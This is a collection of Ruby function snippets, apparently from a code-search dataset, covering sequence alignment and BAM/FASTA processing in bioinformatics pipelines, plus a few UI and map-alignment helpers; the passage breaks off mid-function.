"def process_bam(input_file, fasta, skip)\n\n\t\t# general settings\n\t\texclude = []\n\t\tFile.open(skip, 'r').readlines.each {|line| exclude << line.strip}\n\t\tfirstline = TRUE \n\t\tanchor_left = nil\n\t\tanchor_right = nil\n\t\tchr_a = nil\n\t\tchr_b = nil\n\t\tinput_hash = {}\n\n\t\t# Initiate chromosome hash\n\t\tDir.foreach(fasta) do |item|\n\t\t\tchr = item.sub('.fa', '')\n\t\t\tnext if item == '.' || item == '..' || exclude.include?(chr) \n\t\t\tinput_hash[chr] = {}\n\t\tend\n\n\t\tinput_hash.each_key do |chr_a|\n\t\t\tinput_hash.keys.each {|chr_b| input_hash[chr_a][chr_b] = []}\n\t\tend\n\n\t\t# read bam file\n\t\tinput_file.each do |line|\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\n\t\t\tif firstline \n\t\t\t\tanchor_left = ReadBam.new(line)\n\t\t\t\tfirstline = FALSE\n\t\t\t\tchr_a = anchor_left.chr\n\t\t\telse\n\t\t\t\tanchor_right = ReadBam.new(line)\n\t\t\t\tchr_b = anchor_right.chr\n\t\t\t\t\n\t\t\t\tif input_hash.has_key?(chr_a) && interChimeric?(anchor_left, anchor_right, exclude)\n\t\t\t\t\t\n\t\t\t\t\tif anchor_left.strand == 1 && anchor_right.strand == 1\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\telsif anchor_left.strand == -1 && anchor_right.strand == -1\n\t\t\t\t\t\tinput_hash[chr_a][chr_b] << [anchor_left, anchor_right] \n\t\t\t\t\telse\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tanchor_left, anchor_right = nil\n\t\t\t\tfirstline = TRUE\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found anchor pairs.\"\t\t\n\t\tinput_hash\n\tend",
"def warp_aligned\n \n align = params[:align]\n append = params[:append]\n destmap = Map.find(params[:destmap])\n\n if destmap.status.nil? or destmap.status == :unloaded or destmap.status == :loading\n flash.now[:notice] = t('.no_destination')\n redirect_to :action => \"show\", :id=> params[:destmap]\n elsif align != \"other\"\n\n if params[:align_type] == \"original\"\n destmap.align_with_original(params[:srcmap], align, append )\n else\n destmap.align_with_warped(params[:srcmap], align, append )\n end\n flash.now[:notice] = t('.success')\n redirect_to :action => \"warp\", :id => destmap.id\n else\n flash.now[:notice] = t('.unknown_alignment')\n redirect_to :action => \"align\", :id=> params[:srcmap]\n end\n end",
"def align=(_arg0); end",
"def alignment\n fetch('dnd.alignments')\n end",
"def compute\n index(@ref, @ref_base, @software, @annotation)\n\n if @err_rate > 0\n bucketized_alignment\n else # software == :star || err_rate == 0\n unbucketized_alignment\n end\n end",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def fasta2anchors(input_file, anchor_length, sequencing_type, output_file)\n\t\tcounter = -1\n\t\tname, mate, seq = nil, nil, nil\n\t\t\n\t\tFile.open(output_file, 'w') do |output|\t\n\t\t\tFile.open(input_file, 'r').each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\t\n\t\t\t\tif counter % 2 == 0\n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.match(/(?<=\\>)(\\S*)/).to_s.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 2 == 1\n\t\t\t\t\tseq = line.strip\t\n\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\n\t\t\t\t\toutput.puts [\">#{name_A}\", seq_A, \">#{name_B}\", seq_B].join(\"\\n\")\n\t\t\t\t\tname, mate, seq = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend",
"def msa_replace_random(dir,msa_orig_file,seqs_rand_file,msa_rand_file)\n\n\n rs=PValues::RandomSequences.new\n\n\n #all files in same directory\n msa_orig = dir + msa_orig_file\n seqs_rand = dir + seqs_rand_file\n msa_rand = dir + msa_rand_file\n\n\n rs.gen_random_seqs(msa_orig,seqs_rand)\n\n parser = UqamDoc::Parsers.new\n seqs = parser.fastafile_to_fastastring(seqs_rand)\n\n #align\n maf = UqamDoc::Mafft.new #cw2=UqamDoc::ClustalW2.new\n job_id = maf.submit_dna(seqs) #job_id= cw2.submit_dna(seqs)\n #recuperate\n fasta_str = maf.get_msa_wait(job_id) #fasta_str = cw2.get_msa_wait(job_id)\n #puts fasta_str\n\n\n parser.string_to_file(fasta_str,msa_rand)\n\n\n\n\n\n\n end",
"def phylipstring_to_fastastring(phystr)\n ph=Bio::Phylip::PhylipFormat.new(phystr)\n return ph.alignment.output(:fasta) #output_fasta\n\n end",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def align \n return @raw.align \n end",
"def test_alignment_works_in_single_thread\n assert_nothing_raised(\"Can't handle single threaded scenario\") do\n SEQUENCE_GROUPS[0..10].each do |sequence_group|\n align_group(sequence_group)\n end\n end\n end",
"def process()\n # For lanes that don't need alignment, run post run and exit\n if @reference.eql?(\"sequence\")\n puts \"No alignment to perform since reference is \\\"sequence\\\"\"\n puts \"Running postrun script\"\n runPostRunCmd(\"\")\n exit 0\n end\n\n outputFile1 = @sequenceFiles[0] + \".sai\"\n\n alnCmd1 = buildAlignCommand(@sequenceFiles[0], outputFile1) \n obj1 = Scheduler.new(@fcAndLane + \"_aln_Read1\", alnCmd1)\n obj1.setMemory(@maxMemory)\n obj1.setNodeCores(@cpuCores)\n obj1.setPriority(@priority)\n obj1.runCommand()\n alnJobID1 = obj1.getJobName()\n\n # paired end flowcell\n if @isFragment == false\n outputFile2 = @sequenceFiles[1] + \".sai\"\n alnCmd2 = buildAlignCommand(@sequenceFiles[1], outputFile2)\n obj2 = Scheduler.new(@fcAndLane + \"_aln_Read2\", alnCmd2)\n obj2.setMemory(@maxMemory)\n obj2.setNodeCores(@cpuCores)\n obj2.setPriority(@priority)\n obj2.runCommand()\n alnJobID2 = obj2.getJobName()\n\n sampeCmd = buildSampeCommand(outputFile1, outputFile2, @sequenceFiles[0],\n @sequenceFiles[1])\n obj3 = Scheduler.new(@fcAndLane + \"_sampe\", sampeCmd)\n obj3.setMemory(@lessMemory)\n obj3.setNodeCores(@minCpuCores)\n obj3.setPriority(@priority)\n obj3.setDependency(alnJobID1)\n obj3.setDependency(alnJobID2)\n obj3.runCommand()\n makeSamJobName = obj3.getJobName()\n else\n # Flowcell is fragment\n samseCmd = buildSamseCommand(outputFile1, @sequenceFiles[0])\n obj3 = Scheduler.new(@fcAndLane + \"_samse\", samseCmd)\n obj3.setMemory(@lessMemory)\n obj3.setNodeCores(@minCpuCores)\n obj3.setPriority(@priority)\n obj3.setDependency(alnJobID1)\n obj3.runCommand()\n makeSamJobName = obj3.getJobName()\n end\n\n # Sort a BAM\n sortBamCmd = sortBamCommand()\n obj5 = Scheduler.new(@fcAndLane + \"_sortBam\", sortBamCmd)\n obj5.setMemory(@lessMemory)\n obj5.setNodeCores(@minCpuCores)\n obj5.setPriority(@priority)\n obj5.setDependency(makeSamJobName)\n obj5.runCommand()\n sortBamJobName = obj5.getJobName() \n\n # Mark duplicates on BAM\n markedDupCmd = markDupCommand()\n obj6 = Scheduler.new(@fcAndLane + \"_markDupBam\", markedDupCmd)\n obj6.setMemory(@lessMemory)\n obj6.setNodeCores(@minCpuCores)\n obj6.setPriority(@priority)\n obj6.setDependency(sortBamJobName)\n obj6.runCommand()\n markedDupJobName = obj6.getJobName()\n prevCmd = markedDupJobName\n\n # Filter out phix reads\n if @filterPhix == true\n phixFilterCmd = filterPhixReadsCmd(@markedBam)\n objX = Scheduler.new(@fcAndLane + \"_phixFilter\", phixFilterCmd)\n objX.setMemory(@lessMemory)\n objX.setNodeCores(@minCpuCores)\n objX.setPriority(@priority)\n objX.setDependency(prevCmd)\n objX.runCommand()\n phixFilterJobName = objX.getJobName()\n prevCmd = phixFilterJobName\n end\n\n # Fix mate information for paired end FC\n if @isFragment == false\n fixMateCmd = fixMateInfoCmd()\n objY = Scheduler.new(@fcAndLane + \"_fixMateInfo\" + @markedBam, fixMateCmd)\n objY.setMemory(@lessMemory)\n objY.setNodeCores(@minCpuCores)\n objY.setPriority(@priority)\n objY.setDependency(prevCmd)\n objY.runCommand()\n fixMateJobName = objY.getJobName()\n prevCmd = fixMateJobName\n end\n\n # Fix unmapped reads. When a read aligns over the boundary of two\n # chromosomes, BWA marks this read as unmapped but does not reset CIGAR to *\n # and mapping quality zero. 
This causes picard's validator to complain.\n # Hence, we fix that anomaly here.\n fixCIGARCmd = buildFixCIGARCmd(@markedBam)\n fixCIGARObj = Scheduler.new(@fcAndLane + \"_fixCIGAR\" + @markedBam, fixCIGARCmd)\n fixCIGARObj.setMemory(@lessMemory)\n fixCIGARObj.setNodeCores(@minCpuCores)\n fixCIGARObj.setPriority(@priority)\n fixCIGARObj.setDependency(prevCmd)\n fixCIGARObj.runCommand()\n fixCIGARJobName = fixCIGARObj.getJobName()\n prevCmd = fixCIGARJobName\n\n # Calculate Alignment Stats\n mappingStatsCmd = calculateMappingStats()\n obj7 = Scheduler.new(@fcAndLane + \"_AlignStats\", mappingStatsCmd)\n obj7.setMemory(@lessMemory)\n obj7.setNodeCores(@minCpuCores)\n obj7.setPriority(@priority)\n obj7.setDependency(prevCmd)\n obj7.runCommand()\n runStatsJobName = obj7.getJobName()\n prevCmd = runStatsJobName\n\n if @chipDesign != nil && !@chipDesign.empty?()\n captureStatsCmd = buildCaptureStatsCmd()\n capStatsObj = Scheduler.new(@fcAndLane + \"_CaptureStats\", captureStatsCmd)\n capStatsObj.setMemory(@lessMemory)\n capStatsObj.setNodeCores(@minCpuCores)\n capStatsObj.setPriority(@priority)\n capStatsObj.setDependency(prevCmd)\n capStatsObj.runCommand()\n capStatsJobName = capStatsObj.getJobName()\n prevCmd = capStatsJobName\n end\n\n # Hook to run code after final BAM is generated\n runPostRunCmd(prevCmd)\n end",
"def muscle_sequence2(ref_seq = \"\", test_seq = \"\", temp_dir=File.dirname($0))\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref_seq\n temp_in.puts name\n temp_in.puts test_seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)[\">test\"]\n aln_ref = fasta_to_hash(temp_aln)[\">ref\"]\n File.unlink(temp_file)\n File.unlink(temp_aln)\n return [aln_ref, aln_seq]\nend",
"def muscle_sequence(ref_seq = \"\", test_seq = \"\", temp_dir=File.dirname($0))\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref_seq\n temp_in.puts name\n temp_in.puts test_seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)[\">test\"]\n File.unlink(temp_file)\n File.unlink(temp_aln)\n return aln_seq\nend",
"def warp_aligned\n\n align = params[:align]\n append = params[:append]\n destmap = Map.find(params[:destmap])\n\n if destmap.status.nil? or destmap.status == :unloaded or destmap.status == :loading\n flash.now[:notice] = \"Sorry the destination map is not available to be aligned.\"\n redirect_to action: \"show\", id: params[:destmap]\n elsif align != \"other\"\n\n if params[:align_type] == \"original\"\n destmap.align_with_original(params[:srcmap], align, append )\n else\n destmap.align_with_warped(params[:srcmap], align, append )\n end\n flash.now[:notice] = \"Map aligned. You can now rectify it!\"\n redirect_to action: \"warp\", id: destmap.id\n else\n flash.now[:notice] = \"Sorry, only horizontal and vertical alignment are available at the moment.\"\n redirect_to action: \"align\", id: params[:srcmap]\n end\n end",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped reads into fastq-format.\"\t\n\tend",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def perform\n result_file = nil\n \n # Create the alignment files\n result_file = generate_alignment if @task == :all || @task == :align\n \n # Identify the clusters\n result_file = identify_clusters if @task == :all || @task == :cluster\n \n result_file\n end",
"def alignment_strings(start=0,stop=self.length,organisms=nil) \n answer = Array.new \n self.genomic_aligns.each do |contig|\n if organisms.nil? # if no organisms were specified to limit the results\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name)) unless sequence.nil?\n else\n if organisms.include?(contig.find_organism)\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name))\n end\n end \n end\n return answer \n end",
"def align_local(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = 0\n end\n for j in 0..y\n tab[0][j] = 0\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert, 0].max\n end\n end\n\n @table = tab\n value = 0\n @lok_max_coordinates = [0,0]\n for i in 1..x\n for j in 1..y\n if tab[i][j] >= value\n value = tab[i][j]\n @lok_max_coordinates = [i, j]\n end\n end\n end\n EvaluatedProtein.new(protein, value)\n end",
"def alignment= value\n raise unless ALIGNMENTS.any? {|a| a == value }\n @alignment = value\n end",
"def align; end",
"def align; end",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def column_align colindex, lrc=:NONE\n if lrc == :NONE\n return get_column(colindex).align\n #return @calign[colindex]\n end\n raise ArgumentError, \"wrong alignment value sent\" if ![:right, :left, :center].include? lrc\n get_column(colindex).align = lrc\n self\n end",
"def display_disorder_annotated_alignment\n thread_num = 65\n @display_array = Array.new\n @max_count = 0\n @contact_consensus_array = Array.new\n @seq_contact_count = Alignment.all(:alignment_name => Alignment.get(params[:id]).alignment_name).count\n longest_alignment = 0;\n alignment_array = []\n @alignment_name = Alignment.get(params[:id]).alignment_name\n Alignment.all(:alignment_name => Alignment.get(params[:id]).alignment_name, \n :order => [:align_order.asc]).each do |alignment|\n puts alignment.alignment_sequence.length\n if alignment.alignment_sequence.length > longest_alignment\n longest_alignment = alignment.alignment_sequence.length\n end\n alignment_array << alignment\n end\n for i in 0..longest_alignment+1\n @contact_consensus_array[i] = Array.new(@seq_contact_count, 0)\n end\n #@contact_consensus_array = Array.new(longest_alignment, Array.new(@seq_contact_count,0))\n puts @contact_consensus_array.length\n puts \"Into The Threads\"\n thread_array=[]\n thread_num.times do |i|\n thread_array[i] = Thread.new{\n while alignment_array.length > 0 do\n alignment = alignment_array.pop\n sequence= alignment.sequence\n display_hash = Hash.new\n alignment_color_array = Array.new \n cur_position = 0 \n orig_position = 0\n AlignmentPosition.all(:alignment_id => alignment.align_id, \n :order => [:alignment_position_id.asc]).each do |position|\n if position.position == cur_position\n amino_acid = sequence.a_asequences.first(:original_position=>orig_position) #AAsequence.first(:id => position.aasequence_id)\n unless amino_acid.nil?\n alignment_color_array[cur_position] = residue_color(amino_acid.disorder_consensus, 0)\n if @contact_consensus_array[cur_position][alignment.align_order].nil?\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n if amino_acid.disorder_consensus >= 0.5\n @contact_consensus_array[cur_position][alignment.align_order] = @contact_consensus_array[cur_position][alignment.align_order] + 1\n end\n else\n puts \"Amino Acid doesn't exits: #{sequence.abrev_name} | #{cur_position}:#{orig_position}\" \n alignment_color_array[cur_position] = residue_color(0, 0)\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n else\n while position.position > cur_position\n alignment_color_array[cur_position] = \"FFFFFF\"\n cur_position += 1\n end\n amino_acid = sequence.a_asequences.first(:original_position=>orig_position) #AAsequence.first(:id => position.aasequence_id)\n unless amino_acid.nil?\n alignment_color_array[cur_position] = residue_color(amino_acid.disorder_consensus, 0)\n if @contact_consensus_array[cur_position].nil?\n puts \"OH no \" + alignment.sequence.abrev_name\n end\n if @contact_consensus_array[cur_position][alignment.align_order].nil?\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n if amino_acid.disorder_consensus >= 0.5\n @contact_consensus_array[cur_position][alignment.align_order] = @contact_consensus_array[cur_position][alignment.align_order] + 1\n end\n else\n puts \"Amino Acid doesn't exits: #{sequence.abrev_name} | #{cur_position}:#{orig_position}\" \n alignment_color_array[cur_position] = residue_color(0, 0)\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n end\n cur_position += 1\n orig_position +=1\n end \n puts display_hash[\"name\"] = Sequence.first(:seq_id => alignment.seq_id).abrev_name \n display_hash[\"alignment\"] = alignment_color_array\n @display_array[alignment.align_order] = display_hash\n if @max_count < cur_position\n @max_count = cur_position\n 
end\n end\n }\n end\n thread_array.map{|t| t.join}\n\n @contact_consensus_array = @contact_consensus_array.map{|a| a.inject(0){|sum,item| sum + item}}\n @cur_position = 0\n @tick_counter = 0\n @alignment_tick_array = Array.new\n while @cur_position <= @max_count\n @cur_position += 1\n @tick_counter += 1\n if @tick_counter != 25\n @alignment_tick_array << \"FFFFFF\"\n else\n @alignment_tick_array << \"000000\"\n @tick_counter = 0\n end\n end\n @display_hash = Hash.new\n @display_hash[\"name\"] = \"\"\n @display_hash[\"alignment\"] = @alignment_tick_array \n @display_array << @display_hash\n if params[:aa_length].nil?\n @aa_length = 400\n else\n @aa_length = params[:aa_length].to_i\n end\n @ranges = (@max_count/@aa_length)\n\n end",
"def aligned_position \n \n cigar_line = \"#{self.cigar_line}\"\n \n x = cigar_line.slice!(/^[0-9]*/)\n char = cigar_line.slice!(/^[A-Z]/)\n \n x.nil? ? x = 1 : x = x.to_i\n char == \"X\" ? start = x : start = 0\n \n char = cigar_line.slice!(/[A-Z]$/)\n y = cigar_line.slice!(/[0-9]*$/)\n \n if y.nil?\n y = 1\n else\n y = y.to_i\n end\n \n if char == \"X\"\n stop = self.genomic_align_block.length - y\n else\n stop = self.genomic_align_block.length\n end\n answer = Array.new\n answer.push(start)\n answer.push(stop)\n return answer\n \n end",
"def alignment_of(member)\n self.class.alignment_of(member)\n end",
"def ref_seq\n\n if _ref_seq\n _ref_seq\n else\n seq = Reference.ref_seq(chromosome, start, stop, strand)\n update_attributes(:_ref_seq => seq)\n seq\n end\n\n end",
"def alignments\n map { |alignment| alignment }\n end",
"def print_align(io, sequences, labels, opts={})\n opts = {:cutoff => 70, :start => 0, :chars => 20}.merge(opts)\n (start, length, chars) = opts.values_at(:start, :cutoff, :chars)\n spacer = \" \"\n\n if opts[:template]\n sequences.unshift(opts[:template])\n labels.unshift(opts[:template_label])\n end\n\n all_stats = Array.new(6,0)\n loop do\n fin = false\n\n max_length = 0\n lines = []\n consensus_line = \"\"\n fragments = sequences.map do |string|\n fin = (start >= string.length )\n break if fin\n\n string_frag = string[start, length]\n\n string_frag\n end ; break if fin\n\n doubles = fragments.zip(labels)\n\n doubles = doubles.select {|frag, _| (frag.size > 0) && (frag =~ /[^-]/) }\n\n max_length = doubles.map {|frag, _| frag.size }.max\n\n (cs, stats) = consensus_string_and_stats( doubles.map {|frag,_| frag } )\n all_stats = all_stats.zip(stats).map {|a,b| a + b }\n\n doubles.push( [cs, \"<CONSENSUS>\"] )\n\n lines = doubles.map {|frag, label| [exactly_chars(label, chars),spacer,frag].join }\n\n ## the counters at the top of the line\n start_s = start.to_s\n finish_s = (start + max_length).to_s\n count_line_gap = max_length - (start_s.size + finish_s.size)\n count_line = [start_s, spacer]\n unless count_line_gap < 1\n count_line << \" \" * count_line_gap\n end\n io.puts [exactly_chars(\"\", chars), spacer, count_line.join].join\n\n io.puts lines.join(\"\\n\")\n\n io.puts \" \" # separator between lines\n start += length\n end\n end",
"def left_align\n @align = nil\n end",
"def fetch_ancestral_sequence(start=0,stop=self.length)\n self.genomic_aligns.select{|c| c.find_organism == \"Ancestral sequences\"}.each do |contig|\n puts contig.find_organism\n #return contig.aligned_sequence[start..stop]\n end\n end",
"def align_column n, alignment\n r = rows\n column(n).each_with_index do |col, i|\n cell = r[i][n]\n cell.alignment = alignment unless cell.alignment?\n end\n end",
"def collaps_qnames(input_file, output_file)\n\t\n\t\tloci = {}\n\t\n\t\t# Read candidate loci and count reads/locus\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")\n\t\t\tqname = line[0]\n\t\t\tbase = qname.gsub(/\\/[1,2]/, '')\n\t\t\tpos_a = line[1..3].join(':')\n\t\t\tpos_b = line[4..6].join(':')\n\t\t\tpos = [pos_a, pos_b].join(':')\n\n\t\t\talignment_length = line[-1]\n\t\n\t\t\tif !loci.has_key?(pos)\n\t\t\t\tloci[pos] = {:count => 1, :qnames => [qname], :l => alignment_length}\n\t\t\telse \n\t\t\t\tloci[pos][:qnames] << qname\n\t\t\t\tloci[pos][:count] += 1\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\tloci.each do |pos, v| \n\t\t\t\toutput.puts [pos.split(':'), v[:count], v[:l], v[:qnames].join(';')].join(\"\\t\") if v[:count] > 0\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Collapsed anchor pairs to single loci.\"\n\tend",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = 